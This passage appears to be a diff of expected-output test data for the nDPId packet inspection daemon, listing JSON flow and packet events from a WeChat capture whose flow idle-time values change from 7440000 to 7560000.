{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00583{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167639887,"flow_last_seen":1492167639887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167639887,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1492167639887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167639887,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8T5xAAEAGxaDAqAFny82XotNhAbttdZ2FAAAAAKACchD+DQAAAgQFtAQCCAoAMdIZAAAAAAEDAwc="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167640138,"flow_last_seen":1492167640138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167640138,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167639887,"flow_last_seen":1492167639887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167639887,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1492167639887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167639887,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8T5xAAEAGxaDAqAFny82XotNhAbttdZ2FAAAAAKACchD+DQAAAgQFtAQCCAoAMdIZAAAAAAEDAwc="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167640138,"flow_last_seen":1492167640138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167640138,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 